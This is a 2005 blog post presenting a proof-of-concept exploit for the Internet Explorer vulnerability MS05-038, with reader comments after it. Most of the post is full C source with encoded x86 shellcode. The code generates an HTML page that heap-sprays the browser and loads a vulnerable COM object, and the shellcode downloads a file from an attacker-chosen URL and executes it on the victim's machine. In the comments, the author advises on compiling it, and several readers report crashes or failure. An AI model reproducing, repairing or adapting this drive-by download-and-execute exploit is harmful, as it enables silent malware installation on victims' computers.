Welcome to my blog -- ZwelL

Ms05038 exploit POC(down&execute)

执行成功后会生成zwell_ms05038.html文件,运行即可.

/*+++++++++++++++++++++++++++++++++++++++++++++++
      Ms05 038 exploit POC
        Write By ZwelL
          2005 8 11
  http://www.donews.net/zwell
        zwell@sohu.com

Some code belongs to Lion(cnhonker), regards to him.
This code tested on Windows 2003
-----------------------------------------------*/

#include <stdio.h>
#include <winsock2.h>

#pragma comment(lib, "ws2_32")

// Use for find the ASM code
#define PROC_BEGIN                     __asm _emit 0x90 __asm  _emit 0x90\
                                       __asm _emit 0x90 __asm  _emit 0x90\
                                       __asm _emit 0x90 __asm  _emit 0x90\
                                       __asm _emit 0x90 __asm  _emit 0x90
#define PROC_END                       PROC_BEGIN
#define SEARCH_STR                     "\x90\x90\x90\x90\x90\x90\x90\x90\x90"
#define SEARCH_LEN                     8
#define MAX_SC_LEN                     2048
#define HASH_KEY                       13

// Define Decode Parameter
#define DECODE_LEN                     21
#define SC_LEN_OFFSET                  7
#define ENC_KEY_OFFSET                 11
#define ENC_KEY                        0xff

// Define Function Addr
#define ADDR_LoadLibraryA              [esi]
#define ADDR_GetSystemDirectoryA       [esi+4]
#define ADDR_WinExec                   [esi+8]
#define ADDR_ExitProcess               [esi+12]
#define ADDR_URLDownloadToFileA        [esi+16]

// Need functions
unsigned char functions[100][128] =
{                                           // [esi] stack layout
    // kernel32 4                           // 00 kernel32.dll
    {"LoadLibraryA"},                       //    [esi]
    {"GetSystemDirectoryA"},                //    [esi+4]
    {"WinExec"},                            //    [esi+8]
    {"ExitProcess"},                        //    [esi+12]
    // urlmon  1                            // 01 urlmon.dll
    {"URLDownloadToFileA"},                 //    [esi+16]
    {""},
};

// Shellcode string
unsigned char  sc[1024] = {0};
unsigned int   Sc_len;

char *htmlbody1=
"<html><body>\r\n"
"<SCRIPT language=\"javascript\">\r\n"
"shellcode = unescape(\"%u4343%u4343\"+\"";

char *htmlbody2=
"\");\r\n"
"bigblock = unescape(\"%u0D0D%u0D0D\");\r\n"
"headersize = 20;\r\n"
"slackspace = headersize+shellcode.length;\r\n"
"while (bigblock.length<slackspace) bigblock+=bigblock;\r\n"
"fillblock = bigblock.substring(0, slackspace);\r\n"
"block = bigblock.substring(0, bigblock.length-slackspace);\r\n"
"while(block.length+slackspace<0x40000) block = block+block+fillblock;\r\n"
"memory = new Array();\r\n"
"for (i=0;i<750;i++) memory[i] = block + shellcode;\r\n"
"</SCRIPT>\r\n"
"<object classid=\"CLSID:083863F1-70DE-11d0-BD40-00A0C911CE86\"></object>\r\n"
"Ms05038 Exploit POC<br>\r\n"
"Made By ZwelL< http://www.donews.net/zwell>\r\n"
"</html>";

// ASM shellcode main function
void    ShellCode();

// Get function hash
static DWORD __stdcall GetHash ( char *c )
{
    DWORD h = 0;

    while ( *c )
    {
        __asm ror h, HASH_KEY

        h += *c++;
    }
    return( h );
}

int buildfile(unsigned char *sc, int len)
{
    int i;
    char writebuf[4096];
    char tmp[4096];
    FILE *stream;

    memset(tmp, 0, 4096);
    memset(writebuf, 0, 4096);
    for(i = 0; i < len; i++)
    {
        sprintf(writebuf, "%s%.2x", writebuf, sc[i] & 0xff);
    }

    if(strlen(writebuf)%4!=0)
        strcat(writebuf, "00");

    for(i=0; i<(strlen(writebuf)/4); i++)
    {
        strcat(tmp, "\%u");
        strncat(tmp, &writebuf[i*4+2], 2);
        strncat(tmp, &writebuf[i*4], 2);
    }

    //printf("%s\n", writebuf);
    //printf("======================\n%s\n", tmp);

    if( (stream = fopen( "zwell_ms05038.html", "w+b" )) != NULL )
    {
        fwrite(htmlbody1, strlen(htmlbody1), 1, stream);
        fwrite( tmp, strlen(tmp), 1, stream );
        fwrite(htmlbody2, strlen(htmlbody2), 1, stream);
        fclose(stream);
    }
    else
    {
        printf("fopen wrong\n");
        exit(0);
    }
    return 0;
}

void Make_ShellCode(char *url1)
{
    unsigned char  *pSc_addr;
    unsigned int   Enc_key=ENC_KEY;
    unsigned long  dwHash[100];
    unsigned int   dwHashSize;
    int i,j,k,l;


    // Get functions hash
    //printf("[+] Get functions hash strings.\r\n");
    for (i=0;;i++)
    {
        if (functions[i][0] == '\x0') break;

        dwHash[i] = GetHash((char*)functions[i]);
        //printf("\t%.8X\t%s\n", dwHash[i], functions[i]);
    }
    dwHashSize = i*4;

    // Deal with shellcode
    pSc_addr = (unsigned char *)ShellCode;

    for (k=0;k<MAX_SC_LEN;++k )
    {
        if(memcmp(pSc_addr+k,SEARCH_STR, SEARCH_LEN)==0)
        {
            break;
        }
    }
    pSc_addr+=(k+SEARCH_LEN);               // Start of the ShellCode

    for (k=0;k<MAX_SC_LEN;++k)
    {
        if(memcmp(pSc_addr+k,SEARCH_STR, SEARCH_LEN)==0) {
            break;
        }
    }
    Sc_len=k;                               // Length of the ShellCode

    memcpy(sc, pSc_addr, Sc_len);           // Copy shellcode to sc[]

    // Add functions hash
    memcpy(sc+Sc_len, (char *)dwHash, dwHashSize);
    Sc_len += dwHashSize;

    // Add url
    memcpy(sc+Sc_len, url1, strlen(url1)+1);
    Sc_len += strlen(url1)+1;

    // Deal with find the right XOR byte
    for(i=0xff; i>0; i--)
    {
        l = 0;
        for(j=DECODE_LEN; j<Sc_len; j++)
        {
            if (
                   ((sc[j] ^ i) == 0x26) || //%
                   ((sc[j] ^ i) == 0x3d) || //=
                   ((sc[j] ^ i) == 0x3f) || //?
                   ((sc[j] ^ i) == 0x40) || //@
                   ((sc[j] ^ i) == 0x00) ||
                   ((sc[j] ^ i) == 0x0D) ||
                   ((sc[j] ^ i) == 0x0A)
                )                           // Define Bad Characters
            {
                l++;                        // If found the right XOR byte，l equals 0
                break;
            };
        }

        if (l==0)
        {
            Enc_key = i;

            //printf("[+] Find XOR Byte: 0x%02X\n", i);
            for(j=DECODE_LEN; j<Sc_len; j++)
            {
                sc[j] ^= Enc_key;
            }

            break;                          // If found the right XOR byte, Break
        }
    }

    // Deal with not found XOR byte
    if (l!=0)
   {
        printf("[-] No xor byte found!\r\n");
        exit(-1);
    }

    // Deal with DeCode string
    *(unsigned char *)&sc[SC_LEN_OFFSET] = Sc_len;
    *(unsigned char *)&sc[ENC_KEY_OFFSET] = Enc_key;

    printf("[+] download url:%s\n", url1);
}

int help()
{
    printf("Usage : ms05038.exe url [-t] \n");
    printf("    the 't' option will let you test for the shellcode first\n");
    exit(0);
}

void main(int argc, char **argv)
{
    WSADATA        wsa;
    unsigned char url[255]={0};
    BOOL b_test;

    printf("\n========================================\n");
    printf("Ms05-038 exploit POC\n");
    printf("Write By Zwell\n");
    printf("2005-8-11\n");
    printf("http://www.donews.net/zwell\n");
    printf("zwell@sohu.com\n");
    printf("========================================\n\n");
    b_test=FALSE;
    if(argc<2)
        help();

    strncpy(url, argv[1], 255);

    if(argc == 3)
        if(!strcmp(argv[2], "-t"))
            b_test = TRUE;

    WSAStartup(MAKEWORD(2,2),&wsa);

    Make_ShellCode(url);
    printf("[+] Build shellcode successful\n");
    buildfile(sc, Sc_len);
    printf("[+] Build file successful\n");
    printf("Now, you can open the builded file(zwell_ms05038.html) with IE to see the result.Good Luck ^_^\n");

    if(b_test)
    {
        printf("Testing the shellcode...\n");
        ((void (*)(void)) &sc)();
    }
    return;
}

// ShellCode function
void ShellCode()
{
    __asm
    {
        PROC_BEGIN                          // C macro to begin proc
//--------------------------------------------------------------------
//
// DeCode
//
//--------------------------------------------------------------------
        jmp     short decode_end

decode_start:
        pop     ebx                         // Decode start addr (esp -> ebx)
        dec     ebx
        xor     ecx,ecx
        mov     cl,0xFF                     // Decode len

    decode_loop:
        xor     byte ptr [ebx+ecx],ENC_KEY     // Decode key
        loop    decode_loop
        jmp     short decode_ok

decode_end:
        call    decode_start

decode_ok:

//--------------------------------------------------------------------
//
// ShellCode
//
//--------------------------------------------------------------------
        jmp     sc_end

sc_start:
        pop     edi                         // Hash string start addr (esp -> edi)

        // Get kernel32.dll base addr
        mov     eax, fs:0x30                // PEB
        mov     eax, [eax+0x0c]             // PROCESS_MODULE_INFO
        mov     esi, [eax+0x1c]             // InInitOrder.flink
        lodsd                               // eax = InInitOrder.blink
        mov     ebp, [eax+8]                // ebp = kernel32.dll base address

        mov     esi, edi                    // Hash string start addr -> esi

        // Get function addr of kernel32
        push    4
        pop     ecx

    getkernel32:
        call    GetProcAddress_fun
        loop    getkernel32

        // Get function addr of urlmon
        push    0x00006e6f
        push    0x6d6c7275                 // urlmon
        push    esp
        call    ADDR_LoadLibraryA          // LoadLibraryA("urlmon");

        mov     ebp, eax                   // ebp = urlmon.dll base address

/*
        push    1
        pop     ecx

    geturlmon:
        call    GetProcAddress_fun
        loop    geturlmon
*/
        call    GetProcAddress_fun

        // url start addr = edi

//LGetSystemDirectoryA:
        sub     esp, 0x20
        mov     ebx, esp

        push    0x20
        push    ebx
        call   ADDR_GetSystemDirectoryA     // GetSystemDirectoryA

//LURLDownloadToFileA:
        // eax = system path size
        // URLDownloadToFileA url save to a.exe
        mov     dword ptr [ebx+eax], 0x652E615C           // "\a.e"
        mov     dword ptr [ebx+eax+0x4], 0x00006578       // "xe"
        xor     eax, eax
        push    eax
        push    eax
        push    ebx                         // %systemdir%\a.exe
        push    edi                         // url
        push    eax
        call    ADDR_URLDownloadToFileA     // URLDownloadToFileA

//LWinExec:
        mov     ebx, esp
        push    eax
        push    ebx
        call    ADDR_WinExec                // WinExec(%systemdir%\a.exe);

Finished:
        //push    1
        call    ADDR_ExitProcess            // ExitProcess();

GetProcAddress_fun:
        push    ecx
        push    esi

        mov     esi, [ebp+0x3C]             // e_lfanew
        mov     esi, [esi+ebp+0x78]         // ExportDirectory RVA
        add     esi, ebp                    // rva2va
        push    esi
        mov     esi, [esi+0x20]              // AddressOfNames RVA
        add     esi, ebp                    // rva2va
        xor     ecx, ecx
        dec     ecx

    find_start:
        inc     ecx
        lodsd
        add     eax, ebp
        xor     ebx, ebx

    hash_loop:
        movsx   edx, byte ptr [eax]
        cmp     dl, dh
        jz      short find_addr
        ror     ebx, HASH_KEY               // hash key
        add     ebx, edx
        inc     eax
        jmp     short hash_loop

    find_addr:
        cmp     ebx, [edi]                  // compare to hash
        jnz     short find_start
        pop     esi                         // ExportDirectory
        mov     ebx, [esi+0x24]             // AddressOfNameOrdinals RVA
        add     ebx, ebp                    // rva2va
        mov     cx, [ebx+ecx*2]             // FunctionOrdinal
        mov     ebx, [esi+0x1C]             // AddressOfFunctions RVA
        add     ebx, ebp                    // rva2va
        mov     eax, [ebx+ecx*4]            // FunctionAddress RVA
        add     eax, ebp                    // rva2va
        stosd                               // function address save to [edi]

        pop     esi
        pop     ecx
        ret

sc_end:
        call sc_start

        PROC_END                            //C macro to end proc
    }
}

Trackback: http://tb.donews.net/TrackBack.aspx?PostId=504349

[点击此处收藏本文] 发表于 2005年08月11日 3:43 PM

superhei 发表于2005-08-11 10:45 PM IP: 218.75.132.*

踩一脚

老乡还好不咯

Y.Q.Hun 发表于2005-08-11 11:32 PM IP: 222.58.52.*

好。。太好了。。。。

fuju 发表于2005-08-12 12:43 AM IP: 221.232.93.*

哦

zwell 发表于2005-08-12 9:27 AM IP: 210.21.230.*

to superhei:
还好，就是工作开始忙起来了，你呢，现在是放假还是在实习啊？
估计快要正式动刀了吧,呵呵...

tombook 发表于2005-08-12 9:34 AM IP: 222.95.55.*

比较吃内存，也容易引起IE出错

tombook 发表于2005-08-12 9:36 AM IP: 222.95.55.*

to superhei:

你不是学医的吧？打死我也不给你治。嘿嘿

david 发表于2005-08-12 11:20 AM IP: 221.221.94.*

很好。想交流漏洞利用技术。请留下你的邮箱地址.我的是usdragon@sina.com

lele 发表于2005-08-12 11:49 AM IP: 218.200.225.*

厉害只有欣赏的份了

wofeiwo 发表于2005-08-12 5:54 PM IP: 218.81.155.*

to : tombook
heige是学医的..听说最近刚妇产科实习归来.....

yonker 发表于2005-08-13 1:22 AM IP: 220.173.41.*

耗内存………………

daniel 发表于2005-08-13 11:43 AM IP: 222.79.124.*

奇怪，我用VC++6.0，好像编译不过去，，，大家是怎么编译的。

ＰＯＷＥＲ发表于2005-08-13 6:54 PM IP: 222.242.148.*

嗯，兄弟，不错，支持，收到我的MAIL了吗？

superhei 发表于2005-08-13 9:00 PM IP: 218.75.132.*

我还熬熬~~~

mutiger 发表于2005-08-14 1:12 AM IP: 220.184.115.*

请问如何编译啊

mutiger 发表于2005-08-14 1:42 AM IP: 220.184.65.*

实在不会搞啊。老大。有编译好的吗

Tyn0r 发表于2005-08-14 5:17 AM IP: 84.100.75.*

error :

Compilateur: Default compiler
Exécution de gcc.exe...
gcc.exe "C:\Dev-Cpp\aTx\SansNom1.c" -o "C:\Dev-Cpp\aTx\SansNom1.exe" -pg -g3 -I"C:\Dev-Cpp\include" -L"C:\Dev-Cpp\lib" -lgmon -pg -g3
C:\Dev-Cpp\aTx\SansNom1.c: In function `GetHash':
C:\Dev-Cpp\aTx\SansNom1.c:80: error: syntax error before "ror"

C:\Dev-Cpp\aTx\SansNom1.c: In function `main':

C:\Dev-Cpp\aTx\SansNom1.c:238: warning: return type of 'main' is not `int'
C:\Dev-Cpp\aTx\SansNom1.c: In function `ShellCode':
C:\Dev-Cpp\aTx\SansNom1.c:281: error: syntax error before '{' token

Exécution terminée

Tyn0r 发表于2005-08-14 5:18 AM IP: 84.100.75.*

help me !

Problem 发表于2005-08-14 8:38 AM IP: 211.27.131.*

Gday guys I am facing the same problem as Tyn0r and I use Dev C++ aswell. Could you please inform us on what we need to compile it. my msn is blindesk8er2002@hotmail.com or you cna just post the solution here.

Many Thanks,

Pico

P.S: Zwell your a fuckin legend! :D:D

zwell 发表于2005-08-14 9:37 AM IP: 219.134.42.*

to everybody:
I used vc++.net to compile this. If you guys use dev-c++, you should know the different in handling "asm", like :

__asm ror h, HASH_KEY

you must changed it as:
__asm ("ror h, HASH_KEY");

because dev-c++ use gcc for its compiler...

Another thing you should pay attention to is the type of the funcion--"main", it must "int" but not "void" in dev-c++.

Whatever, good luck...

PicoWico 发表于2005-08-14 10:04 AM IP: 211.27.131.*

Hello Zwell,

I thank you very much for your help. Although there is 1 error left still :S

Compiler: Default compiler
Executing gcc.exe...
gcc.exe "C:\New Folder\ms05038.c" -o "C:\New Folder\ms05038.exe" -g3 -I"C:\Dev-Cpp\include" -L"C:\Dev-Cpp\lib" -g3
C:\New Folder\ms05038.c: In function `ShellCode':
C:\New Folder\ms05038.c:293: error: syntax error before '{' token

Execution terminated

--------------------------- Source

// ShellCode function
void ShellCode()
{
__asm
{
PROC_BEGIN // C macro to begin proc
//--------------------------------------------------------------------

PicoWico 发表于2005-08-14 2:39 PM IP: 211.27.131.*

help please dude!!! :(:(

zwell 发表于2005-08-14 3:04 PM IP: 210.21.230.*

it's all the same, change all the "asm" to gcc's style...

PicoWico 发表于2005-08-14 3:18 PM IP: 211.27.131.*

I've done that but it doesn't help it :S I tried compiling it with visual c++ also with all the headers and no success >,<

Could you possibly compile it or change it into dev c++ code :/

Thanks mate,

Pico

alpha 发表于2005-08-15 8:39 AM IP: 222.90.25.*

hello zwell
i want to ask which os can be used by this code ?
i tested it on win2000server sp0 unsuccess
i tested it on xp sp2 ,the ie had a error

Hey 发表于2005-08-15 1:15 PM IP: 211.27.131.*

Hey Alpha dude how did you compile it??? IF you don't wanna tell me can u host the compiled version -,-

Thanks

EmJKHuang 发表于2005-08-15 3:28 PM IP: 61.219.36.*

Hum...

How do compile the fxxking?

It sounds that speaker complained failing in operating.

In order to compile it successfully, you ought to learn the basic !

Not Just Waits for the product !

All I learned from the code is the theorem, special thanks to ZWelL spend time for it. :)

I'd like to convert the instrusions into formal shellcode.

QQ281399636EMail:pinxu520@163.com 发表于2005-08-15 4:31 PM IP: 202.103.223.*

hi ZWelL
i have complie that on VC++6.0,it is all for that complie,but i must should tell you that it can't word on any system but also win2000 or win xp ,win 2003
it show be failture for all~~!
unluckily say to you that~~
so i think that exploit could not word,and could not success
and who is success ?please call me QQ:281399636
or Email pinxu520@163.com
thanks ,but still thanks ZWEL

اhidy 发表于2005-08-16 12:14 AM IP: 82.167.11.*

How to complile this ? can I have compile file

thank you

newdragon 发表于2005-08-16 4:39 PM IP: 222.76.236.*

生成的html到底执行后会造成什么后果？

Snowcrash 发表于2005-08-17 11:24 AM IP: 67.172.230.*

I am using vs.net to build.
I created a command line application.
I then told it to compile a release version.
I got some ""Cannot convert unsigned char[255] to char * for url. (On the strncpy and Make_ShellCode calls)
1st I changed url from 'unsigned char url[255]={0} to char url[255]={0}
It built but just crashes IE when I open it up.
2nd I changed to url back then tried strncpy((char*)url, . . and Make_ShellCode((char*)url); It also built but still crashes IE.

I tested on XP sp2 and Win2k both using IE 6.

Any hints to get it work would be nice at this point. My guess is the unsigned char might be messing up the shell code

QQ281399636EMail:pinxu520@163.com 发表于2005-08-17 9:22 PM IP: 207.69.167.*

failture again

who can help me

thanks so much

ddd@ss.com 发表于2005-08-25 6:23 AM IP: 161.44.173.*

code sucks, doesnt even work!!

dude 发表于2005-08-30 1:43 AM IP: 82.80.53.*

yo man, i got the same prob as Snowcrash... ur code's amazing man...plz tell me how to fix that unsigned shit coz no matter what i try, the prog just keeps crashing. btw Snowcrash, if u find a solution plz post

myxex 发表于2005-09-11 2:32 AM IP: 219.135.12.*

编译成功了!生成文件后运行后内存资源狂占，引起死机而且不起作用!
不知道代码是否出错呢?
请指教!~

发表评论


大名
网址
验证码
评论
记住我

Welcome to my blog -- ZwelL

导航

公告

文章

收藏

相册

Hack's Link

Linux

Program's Link

Sign's Link

Study

worship

存档

最近评论

发表评论